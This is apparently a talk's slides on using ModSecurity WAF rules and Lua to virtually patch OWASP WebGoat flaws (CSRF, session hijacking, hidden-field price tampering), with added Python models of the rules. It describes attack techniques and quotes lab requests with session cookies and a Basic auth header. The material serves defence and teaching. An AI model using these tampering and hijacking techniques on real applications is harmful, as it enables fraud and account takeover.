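TOKEN_NAME = "MODSEC_CSRF_TOKEN"

# Stand-in (constructed for this example) for ModSecurity's SESSION persistent
# collection: one record per session id, as created by setsid.
sessions = {}


def sha1_hex(value):
    """Equivalent of t:sha1,t:hexEncode applied to a string."""
    return hashlib.sha1(value.encode()).hexdigest()


def learn_session(set_cookie_header):
    """Phase 3 (CSRF Rules 1): capture the issued JSESSIONID, store its SHA-1 as the token."""
    m = JSESSIONID_RE.search(set_cookie_header)
    if not m:
        return None
    sid = m.group(1)
    sessions[sid] = {"sessionid": sid, "csrf_token": sha1_hex(sid)}
    return sid


def inject_token(sid, request_filename, body):
    """Phase 4 append action: add the token variables to WebGoat pages of a known session."""
    if sid not in sessions or "/WebGoat/attack" not in request_filename:
        return body
    script = ('<script language="JavaScript"> var tokenName = \'%s\'; '
              'var tokenValue = \'%s\'; </script>'
              % (TOKEN_NAME, sessions[sid]["csrf_token"]))
    return body + script


def check_request(sid, query_string, post_body=""):
    """Phase 2 (CSRF Rules 2). Returns None to allow, or the rule's msg text to deny.

    sid is the JSESSIONID the client sent; in the deck it reaches the SESSION
    collection through the phase-1 setsid rule on the Session Rules slides.
    """
    args = parse_qs(query_string, keep_blank_values=True)
    for name, values in parse_qs(post_body, keep_blank_values=True).items():
        args.setdefault(name, []).extend(values)
    if not args:  # &ARGS "@ge 1" is false: a bare request carries nothing to protect
        return None
    if len(args.get(TOKEN_NAME, [])) != 1:  # &ARGS:MODSEC_CSRF_TOKEN "!@eq 1"
        return "CSRF Attack Detected - Missing CSRF Token."
    expected = sessions.get(sid, {}).get("csrf_token")
    if args[TOKEN_NAME][0] != expected:  # ARGS:MODSEC_CSRF_TOKEN "!@streq %{SESSION.CSRF_TOKEN}"
        return "CSRF Attack Detected - Invalid Token."
    return None
```

Because the token is a deterministic hash of the session cookie, its secrecy is exactly the cookie's: a cross-site attacker who cannot read the victim's JSESSIONID cannot compute the token, which is all this patch needs. The Referer line in the screenshot shows the token also travelling in the query string; since URLs end up in Referer headers and logs, a deployment is better off carrying it only in POST bodies.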
CSRF Content Injection

POST request to http://www.webgoat.net/WebGoat/attack?Screen=118&menu=900

POST /WebGoat/attack?Screen=118&menu=900 HTTP/1.1
Host: www.webgoat.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://www.webgoat.net/WebGoat/attack?Screen=118&menu=900&MODSEC_CSRF_TOKEN=4ffc9823f93eb12000378159c7536096592d41fd
Cookie: JSESSIONID=44652680ECCB7A6CAC039DDD137FF01E
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Content-Type: application/x-www-form-urlencoded
Content-Length: 123

title=Nice+Site%21&message=I+like+this+site+%3A%29&SUBMIT=Submit&MODSEC_CSRF_TOKEN=4ffc9823f93eb12000378159c7536096592d41fd
SOLUTION EXAMPLE: SESSION MANAGEMENT FLAWS
Session-Based Attacks

Defect:

- The web application does not "remember" who it issued the SessionID to.

- Clients submit SessionIDs that the web application did not issue (via Set-Cookie).

Vulnerability:

- Attacker can use SessionIDs that belong to other users.

Technique:

- Brute Force Guessing SessionIDs

- Session Hijacking

- Session Fixation

Consequence:

- Session Hijacking
Identifying Session Attacks

Two requests carrying the same SessionID but different User-Agents:

GET /mybank.php HTTP/1.0
Host: bank.example.com
User-Agent: Mozilla/4.0
Cookie: sessionid=11111
Connection: close

GET /mybank.php HTTP/1.0
Host: bank.example.com
User-Agent: Mozilla/5.0
Cookie: sessionid=11111
Connection: close

guardian.jumperz.net

Session Flaw Mitigation

Tracking SessionIDs

- Use ModSecurity's Session Persistent Collection
  • Data is saved for each Session ID

- Capture Hash Values of Meta-Data and Save in Session Collection
  • Valid Session Token
  • IP Network Block Hash
  • User-Agent Hash

- Validate SessionID Data on Subsequent Requests
  • Valid Session Token
  • IP Network Block Hash
  • User-Agent Hash
Session Rules (1)

Storing SessionID Meta-Data

# Phase 3: record the session id the application issued, mark it valid, and
# stash the client's address and User-Agent in TX for hashing below.
SecRule RESPONSE_HEADERS:/Set-Cookie2?/ "(?i:jsessionid=([a-f0-9]+)\;\s?)" \
  "phase:3,t:none,pass,log,capture,msg:'Captured session id from response cookie: %{TX.1}',setsid:%{TX.1},setvar:session.sessionid=%{TX.1},setvar:tx.ip=%{remote_addr},setvar:tx.ua=%{request_headers.user-agent},setvar:session.valid=1"

# Capture the /24 network block first and hash it in a second rule: ModSecurity
# applies transformations (t:sha1,t:hexEncode) before the operator runs, so a
# dotted-quad regex in the same rule would be matched against the hash and never fire.
SecRule TX:IP "^(\d{1,3}\.\d{1,3}\.\d{1,3}\.)" "phase:3,capture,t:none,nolog,pass,setvar:tx.ip_block=%{tx.1}"
SecRule TX:IP_BLOCK "(.*)" "phase:3,capture,t:none,t:sha1,t:hexEncode,nolog,pass,setvar:session.ip=%{tx.1}"

SecRule TX:UA "(.*)" "phase:3,capture,t:none,t:sha1,t:hexEncode,nolog,pass,setvar:session.ua=%{tx.1}"
Session Rules (2)

Validate SessionID Meta-Data

# Phase 1: bind the request to the SESSION collection named by its JSESSIONID cookie.
SecRule REQUEST_COOKIES:JSESSIONID "!^$" \
  "phase:1,t:none,pass,nolog,setsid:%{request_cookies.jsessionid},setvar:session.sessionid=%{request_cookies.jsessionid},setvar:tx.ip=%{remote_addr},setvar:tx.ua=%{request_headers.user-agent}"

# A session the application never issued (no 'valid' flag stored in phase 3) is rejected.
SecRule &SESSION:VALID "!@eq 1" "phase:1,t:none,deny,log,msg:'Invalid SessionID Submitted.'"

# Hash the current network block and User-Agent the same way they were stored
# (block captured first, hashed in a separate rule; see Session Rules (1)).
SecRule TX:IP "^(\d{1,3}\.\d{1,3}\.\d{1,3}\.)" "phase:2,capture,t:none,nolog,pass,setvar:tx.ip_block=%{tx.1}"
SecRule TX:IP_BLOCK "(.*)" "phase:2,capture,t:none,t:sha1,t:hexEncode,nolog,pass,setvar:tx.ip_hash=%{tx.1}"

SecRule TX:UA "(.*)" "phase:2,capture,t:none,t:sha1,t:hexEncode,nolog,pass,setvar:tx.ua_hash=%{tx.1}"

# One mismatch only raises an anomaly score and logs; both together deny.
SecRule TX:IP_HASH "!@streq %{SESSION.IP}" \
  "phase:2,t:none,pass,log,setvar:tx.sticky_session_anomaly=+1,msg:'Warning - Sticky SessionID Data Changed - IP Address Mismatch.'"

SecRule TX:UA_HASH "!@streq %{SESSION.UA}" \
  "phase:2,t:none,pass,log,setvar:tx.sticky_session_anomaly=+1,msg:'Warning - Sticky SessionID Data Changed - User-Agent Mismatch.'"

SecRule TX:STICKY_SESSION_ANOMALY "@eq 2" \
  "phase:2,t:none,deny,log,msg:'Warning - Sticky SessionID Data Changed - IP Address and User-Agent Mismatch.'"
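As an added example that is not from the deck, the two Session Rules slides reduced to a stand-alone Python model. The sessions dict, on_set_cookie, validate_request and network_block_hash are names chosen here; the inputs used to exercise it (the session id 11111 and the two User-Agents from the Guardian screenshot, documentation-range IP addresses) are constructed, and the lab's JSESSIONID cookie format is reused. It follows the slides in hashing the /24 network block rather than the full address, scoring one anomaly per mismatch and denying only when both differ, and in rejecting session ids the application never issued.

```python
import hashlib
import re

# Constructed stand-in for ModSecurity's SESSION persistent collection, keyed by session id.
sessions = {}

JSESSIONID_RE = re.compile(r"(?i)jsessionid=([a-f0-9]+);\s?")
# The slide's regex: keep the first three octets, i.e. the /24 network block.
NET_BLOCK_RE = re.compile(r"^(\d{1,3}\.\d{1,3}\.\d{1,3}\.)")


def sha1_hex(value):
    """t:sha1,t:hexEncode equivalent."""
    return hashlib.sha1(value.encode()).hexdigest()


def network_block_hash(remote_addr):
    """Hash the network block, not the full address, so a client whose last
    octet changes (DHCP lease, NAT pool) does not trip the check."""
    m = NET_BLOCK_RE.match(remote_addr)
    return sha1_hex(m.group(1)) if m else None


def on_set_cookie(set_cookie_header, remote_addr, user_agent):
    """Session Rules (1): remember who the JSESSIONID was issued to."""
    m = JSESSIONID_RE.search(set_cookie_header)
    if not m:
        return None
    sid = m.group(1)
    sessions[sid] = {
        "sessionid": sid,
        "valid": 1,
        "ip": network_block_hash(remote_addr),
        "ua": sha1_hex(user_agent),
    }
    return sid


def validate_request(jsessionid, remote_addr, user_agent):
    """Session Rules (2): returns (verdict, msg) with verdict allow / warn / deny."""
    sess = sessions.get(jsessionid)
    if sess is None or sess.get("valid") != 1:
        return ("deny", "Invalid SessionID Submitted.")
    anomaly = 0
    changed = []
    if network_block_hash(remote_addr) != sess["ip"]:
        anomaly += 1
        changed.append("IP Address")
    if sha1_hex(user_agent) != sess["ua"]:
        anomaly += 1
        changed.append("User-Agent")
    if anomaly == 2:
        return ("deny", "Sticky SessionID Data Changed - IP Address and User-Agent Mismatch.")
    if anomaly == 1:
        return ("warn", "Sticky SessionID Data Changed - %s Mismatch." % changed[0])
    return ("allow", "")
```

A single mismatch is only a warning because either attribute changes legitimately on its own (a browser update, a move between networks); the two changing together inside one session is the signal the slides treat as hijacking.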
SOLUTION EXAMPLE: HIDDEN PARAMETER TAMPERING
Hidden Parameter Tampering

Defect:

- The web application keeps track of session state data by adding on "HIDDEN" form parameters.

Vulnerability:

- Attackers can manipulate this data.

Technique:

- Attacker can edit the page source or use a local web proxy to intercept the response data and change it.

Consequence:

- Session Hijacking, Business Logic Flaws
Hidden Parameter Tampering

Screenshot: OWASP WebGoat v5.2, Parameter Tampering > Exploit Hidden Fields
http://www.webgoat.net/WebGoat/attack?Screen=665&menu=1600&MOD...

Lesson text: Try to purchase the HDTV for less than the purchase price, if you have not done so already.

View Source of the lesson page, showing the hidden price field:

    </td>
    </tr>
    </table>
    </form></div>

    <input name='Price' type='HIDDEN' value='2999.99'>

    <br>

    <div id="credits">
    <table align='RIGHT' cellspacing='' width='90%' border='0' cellpadding=''>
    <tr>
    <td valign='MIDDLE' width='100%' align='RIGHT'>
Parameter Manipulation Mitigation

- Use ModSecurity's Session Persistent Collection
  • Data is saved for each Session ID

- Inspect Response Body Payload for HIDDEN Parameter Data
  • Save HIDDEN data in Session Collection

- Validate Parameter Data on Subsequent Requests
  • Check if saved Hidden Parameter Name Exists in Request
  • Ensure the Hidden Parameter Data is Unaltered
Parameter Manipulation Rules (1)

Capture Outbound HIDDEN Data

# Phase 4: pull the hidden <input> tag out of the (lowercased) response body,
# then extract its name and value and store "name=value" in the session.
SecRule RESPONSE_BODY "(<input\s.*type=[\"']?hidden[\"']?[\s>][^<]*>)" \
  "chain,phase:4,t:none,t:lowercase,pass,nolog,capture,setvar:tx.hidden_data=%{tx.1}"
  SecRule TX:HIDDEN_DATA "<input\s.*name=[\"']?([\w\s]*)[\"']?[\s>]" \
    "chain,capture,setvar:session.hidden_arg_name=%{tx.1}"
    SecRule TX:HIDDEN_DATA "<input\s.*value=[\"']?([\w\s\.]*)[\"']?[\s>]" \
      "capture,setvar:session.hidden_arg=%{session.hidden_arg_name}=%{tx.1}"
Parameter Manipulation Rules (1)

Validate Inbound Parameter Data

# Phase 2: if a hidden field was recorded for this session and the request
# names it, the body must still contain the exact "name=value" that was sent out.
# The stored name was lowercased in phase 4, so the submitted names are lowercased too.
SecRule &SESSION:HIDDEN_ARG_NAME "@gt 0" \
  "chain,phase:2,t:none,log,auditlog,deny,msg:'Hidden Parameter Manipulation.'"
  SecRule ARGS_POST_NAMES "@contains %{SESSION.HIDDEN_ARG_NAME}" "chain,t:none,t:lowercase"
    SecRule REQUEST_BODY "!@contains %{SESSION.HIDDEN_ARG}" "t:none,t:lowercase"
Viewing Hidden Collection Data

# java -cp /root/org.jwall.tools.jar org.jwall.tools.CollectionViewer /tmp/
Reading collections from /tmp
Collection default_SESSION, last read @ Fri Jan 30 04:08:39 EST 2009
Created at Fri Jan 30 04:05:56 EST 2009
default_SESSION[].sessionid = D798FE268D317B360020B9D797EFF2A1
default_SESSION[].hidden_arg = price=2999.99
default_SESSION[].ip = d9df736088f7a4a919e4de2634d4b53d487a3b26
default_SESSION[].ua = 467cbdf2fcbeef118adf68237f3ead3a5c7b167
default_SESSION[].hidden_arg_name = price
default_SESSION[].TIMEOUT = 3600
This collection expires in 59m 32.943s
The Need for Lua

ModSecurity Rules Language Limitations

- Allows for easy "and" logic, but it is difficult to do if/then/or structures

- RegEx parsing has problems with capturing multiple individual elements (e.g. more than 1 HIDDEN parameter)

ModSecurity has a Lua API

- User creates scripts that use advanced programming logic

Stephen Evans created many example Lua scripts for WebGoat mitigations

Content Injection (JavaScript) + Lua is a powerful virtual patching combination

- Not constrained by pre-packaged WAF GUI functionality
www.lua.org

Lua Scripts

SecRuleScript "/etc/modsecurity/data/write-hidden-values1.lua" \
  "phase:4,t:none,log,auditlog,allow,msg:'Writing RESPONSE BODY & parsed input fields to file using luascript'"

-- write-hidden-values1.lua: ModSecurity calls main() and exposes its API as the global 'm'.
function main()
  local tbuff = m.getvar("RESPONSE_BODY", "none")
  if tbuff == nil then
    return nil
  end
  for a in string.gmatch(tbuff, "<input .->") do
    local t = {}
    for k, v in string.gmatch(a, "(%w+)='(.-)'") do
      t[k] = v
    end
    -- guard: an <input> without a type attribute would make t.type nil
    if t.type and t.type:lower() == "hidden" then
      -- write t.type, t.name and t.value to file
    end
  end
  return nil  -- nil means "no match": the response is left alone
end

Output file entry:

Entry {
  name = "hidden_tan",
  type = "HIDDEN",
  value = "2"
}
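The single-capture regex on the rule slides can record only one hidden field per response, which is the limitation the Need for Lua slide names. As an added example, not from the deck and not one of Stephen Evans' scripts, here is a Python model that generalises the Parameter Manipulation mitigation to every hidden input in a response and checks each one on the following POST. parse_attributes, learn_hidden_fields, validate_post and the sessions dict are names chosen here; the sample form (WebGoat's Price field plus the hidden_tan entry from the Lua slide) is constructed for the test.

```python
import re
from urllib.parse import parse_qs

# Constructed stand-in for ModSecurity's SESSION persistent collection.
sessions = {}

INPUT_TAG_RE = re.compile(r"<input\s[^>]*>", re.IGNORECASE)
# Matches name="v", name='v' or name=v inside one tag; keys are lowercased below.
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")


def parse_attributes(tag):
    """Return the attributes of one <input ...> tag as a lowercase-keyed dict."""
    attrs = {}
    for m in ATTR_RE.finditer(tag):
        value = next(g for g in m.groups()[1:] if g is not None)
        attrs[m.group(1).lower()] = value
    return attrs


def learn_hidden_fields(sid, response_body):
    """Phase 4: record every hidden field (name -> value) the application sent this session."""
    hidden = {}
    for tag in INPUT_TAG_RE.findall(response_body):
        attrs = parse_attributes(tag)
        if attrs.get("type", "").lower() == "hidden" and "name" in attrs:
            hidden[attrs["name"].lower()] = attrs.get("value", "")
    sessions.setdefault(sid, {})["hidden"] = hidden
    return hidden


def validate_post(sid, request_body):
    """Phase 2: deny when a tracked hidden field comes back with a different value.

    As on the slides, only fields present in the request are compared; a stricter
    patch would also deny when a tracked field is omitted altogether.
    Returns None to allow, or a message naming the first altered field.
    """
    hidden = sessions.get(sid, {}).get("hidden", {})
    if not hidden:
        return None
    args = {k.lower(): v for k, v in
            parse_qs(request_body, keep_blank_values=True).items()}
    for name, expected in hidden.items():
        # a duplicated parameter (two values) also differs from the single stored value
        if name in args and args[name] != [expected]:
            return "Hidden Parameter Manipulation: %s" % name
    return None
```

Keeping a name-to-value map per session is what the Lua route buys over the single-capture rules: the check no longer depends on which hidden field the greedy regex happened to land on.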
Conclusion

A WAF is more than an "attack blocking device."

- Can also identify/correct Application Defects.

- Can be used as an HTTP Auditing device.

There is a tremendous need for Virtual Patching:

- Expedite the implementation of mitigations.

- Provide protection for apps that can't be updated.

ModSecurity is an excellent, tactical tool to use for mitigation strategies:

- Robust rules language

- Content Injection + Lua is powerful
Questions?

Thank you!

Business: Ryan.Barnett@breach.com
Personal: RCBarnett@gmail.com